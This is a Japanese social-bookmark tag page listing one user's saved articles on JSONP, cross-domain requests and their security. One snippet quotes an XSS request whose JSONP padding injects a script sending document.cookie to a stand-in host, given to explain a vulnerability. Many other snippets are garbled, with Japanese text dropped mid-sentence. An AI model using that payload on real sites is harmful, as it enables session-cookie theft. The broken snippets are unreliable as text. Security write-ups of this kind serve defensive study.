タグ

JSONPに関するTAKESAKOのブックマーク (18)

  • 新はてなブックマーク件数取得 API を使って自分のページに件数を埋め込む最も簡単な方法 - IT戦記


     API  ()APIAPI -  -   API  JSONP    HTML   callback  document.write <script src="http://api.b.st-hatena.com/entry.count?url=http%3A%2F%2Fwww.example.com%2F&callback=document.write"></script>  <a href="http://b.ha
    新はてなブックマーク件数取得 API を使って自分のページに件数を埋め込む最も簡単な方法 - IT戦記
  • [気になる]JSONPの守り方


    XSSCSRFSQLWeb  JSONP JSONP使 JSONPJSON with PaddingJSONJavaScriptWebAPIJSONP 
    [気になる]JSONPの守り方
  • Ajax - tips - JSONPをブラウザにキャッシュさせない : 404 Blog Not Found


    2009041312:00 Tips Ajax - tips - JSONP  [] API IE Safari IESafariJSONP URIUniqueOK. function WarosuJSON(cb){ this.proxy = 'http://mimitako.net/api/warosuapi.cgi'; this.cb = cb; this.count = 0; this.parse = function(cb){ var script = document.createElement('scri
    Ajax - tips - JSONPをブラウザにキャッシュさせない : 404 Blog Not Found
  • Afrous プラットフォームサービスをリリースしました、番外編 - snippets from shinichitomita’s journal

    昔懐かしのAfrousですが、まだ実はやってます。というかうちの会社のメインプロダクトです。だいぶブランド名として使いまわしてる感はありますが。 ということで、日リニューアルオープンしました。 HugeDomains.com - Shop for over 300,000 Premium Domains 基的に会社関連の話は会社の方でやるべきだと思うので(市場性とかうんぬん)、ここではそれはおいておいて、中身にどういう要素を使ってるかというところを書きます。 まずは基的なところ。 Ext JS ライブラリにはExt JSつかってます。これは見た目ですぐわかりそうなところで、前からそうだったんで言う必要もないところですけど、1.1.1ベースだったのを2.1に変えました(ほぼ書き直し)。こういったお仕着せのUIについていやがる人もいるかもしれませんが、まあ実装側としてはこれがあって正直か

    Afrous プラットフォームサービスをリリースしました、番外編 - snippets from shinichitomita’s journal
    TAKESAKO
    TAKESAKO 2009/02/04
    >「Afrous では、ブラウザ上でのクロスドメイン通信、そしてクライアントサイドでのマッシュアップを実現することで、このファイアーウォールの壁を取り払いました。」
  • Google App Engineの使い道、tiny web service - snippets from shinichitomita’s journal


     JavaScriptCSV調FlashFirefoxdataWeb CSVJStext/csvechoGoogle App Enginepython, google app en
    Google App Engineの使い道、tiny web service - snippets from shinichitomita’s journal
  • 2008-04-01


     JSONJSONPJavaScript Sea Surfers ML ( by hoshikuzu) 2while(1)while(1) {}eval1while(1)GMail使 
    2008-04-01
  • JPドメインのWhois情報をJSONPで出力

    どうも上手くいかないドメインもあるようだ・・・ Contact Information: [公開連絡窓口]などが記載してあるとダメかも

  • Twitter の crossdomain.xml 問題について。 - てっく煮ブログ


      twitterprotectsetting2008-03-09 - skubota(?)SWF SWF  URL swf (1)(2)
  • JSONP-SEについて気になったこと - monjudoh’s diary

    川崎有亮さんの静的JSONPファイルなのにコールバック関数名を指定できるJavaScriptのエントリに、 凄いけどレスポンスが帰ってくるタイミングしだいではうまく行かないような こんなはてブコメをつけたんですが、時間がたったら自信がなくなってきたので検証してみました。 JSONP-SEではロードされたJavaScriptが自分自身に対応するsrcipt要素の src属性から「callback=何某」をぶっこ抜きます。 ロードされたjavaScriptに対応するscript要素が、 必ず、その時点で一番最後のscript要素であるという前提になっていて、 この前提が崩れると適切なコールバック関数名を取得できません。 なので、処理としては、その時点で一番最後のscript要素のsrc属性をグローバル変数に格納するだけで、 レスポンスが帰ってくる時間だけが違う二つのjsファイル(相当のもの)を

    JSONP-SEについて気になったこと - monjudoh’s diary
    TAKESAKO
    TAKESAKO 2008/01/28
    各ブラウザにおけるscript srcの並列ロードのタイミングの話
  • ウェブリブログ:サービスは終了しました。

    「ウェブリブログ」は 2023年1月31日 をもちましてサービス提供を終了いたしました。 2004年3月のサービス開始より19年近くもの間、沢山の皆さまにご愛用いただきましたことを心よりお礼申し上げます。今後とも、BIGLOBEをご愛顧賜りますよう、よろしくお願い申し上げます。 ※引っ越し先ブログへのリダイレクトサービスは2024年1月31日で終了いたしました。 BIGLOBEのサービス一覧

    ウェブリブログ:サービスは終了しました。
  • Web 2.0的アプリのセキュリティ:再考「機密情報にJSONPでアクセスするな」|アークウェブのブログ


    SE 20071稿Web 2.0JSONPJSONJSONPSea Surfers MLJSONJSONP+JavaScript JSONJSONPJavaScript JSONJSONPJavaScriptJSONPJS
  • snippets from shinichitomita’s journal - AOL WebAIM APIを注目すべき5つの理由


    AOL OpenAuthJSONP11AOL Web AIMAPI Web AIMAPIAPIWebAPIWebWeb 1.  APIJSONP()
    snippets from shinichitomita’s journal - AOL WebAIM APIを注目すべき5つの理由
  • OpenAuthで友達リスト取得 - snippets from shinichitomita’s journal


    AOL OpenAuthJavaScript使調 Yahoo! IDAOL  http://dev.aol.com/gallery_files/getBL.html getToken使JSONPJSONPURL http://api.oscar.aol.com/presence/get?f=json&bl=1&k=bs1312tKAjxKsqZY&a=....&c=parsePresence (k: developer key
    OpenAuthで友達リスト取得 - snippets from shinichitomita’s journal
  • 第4回 Flash、JSONでのクロスドメインアクセス | gihyo.jp


    Flash Proxy使JSONP使Flash使 Flash Webcrossdomain.xmlURL http://www.example.com/crossdomain.xml  crossdomain.xml <cr
    第4回 Flash、JSONでのクロスドメインアクセス | gihyo.jp
    TAKESAKO
    TAKESAKO 2007/08/10
    setterメソッドをサポートしているブラウザ Firefox, Safari 3
  • Kazuho@Cybozu Labs: JSONP - データ提供者側のセキュリティについて


    « E4X-XSS  |  |  » 20070112 JSONP -  JSONP JSONP 使 XSS  GET /json.cgi/append.html?padding=%3Cscript%3Elocation='http://example.jp/'%2Bdocument.cookie%3C/script%3E HTTP/1.0 Host: example.com HTTP/1.0 200 OK Content-Type: text/javascript;
  • AOLのOpenAuthがチャレンジング過ぎて - snippets from shinichitomita’s journal


    AOLOpenAuthAPIYahooBBAuthGoogle Account Authenticationlivedoor AuthAPIAOL ID使JSONP使JSONP使 OpenAuthJSONP
    AOLのOpenAuthがチャレンジング過ぎて - snippets from shinichitomita’s journal
  • Twitterのcallback変数名 - snippets from shinichitomita’s journal


    TwitterJSONPcallback.[] http://www.twitter.com/statuses/user_timeline/3628361.json?callback=JsonWebServicesStub.responseCallbacks._0&count=1  dojoScriptSrcIOJSONP使 
    Twitterのcallback変数名 - snippets from shinichitomita’s journal
  • 「拡張子ではなく、内容によってファイルを開くこと」の拡張子は Content-Type ではないことに注意 - 葉っぱ日記


     JSONP  XSS  Kazuho@Cybozu Labs: JSONP -  JSONP  Padding (JSON4/5) HTML JSONP IE HTML  XSS  IE JSONP  HTML 2IE HTML Content-Type: text/javascript  HTML  
    「拡張子ではなく、内容によってファイルを開くこと」の拡張子は Content-Type ではないことに注意 - 葉っぱ日記
  • 1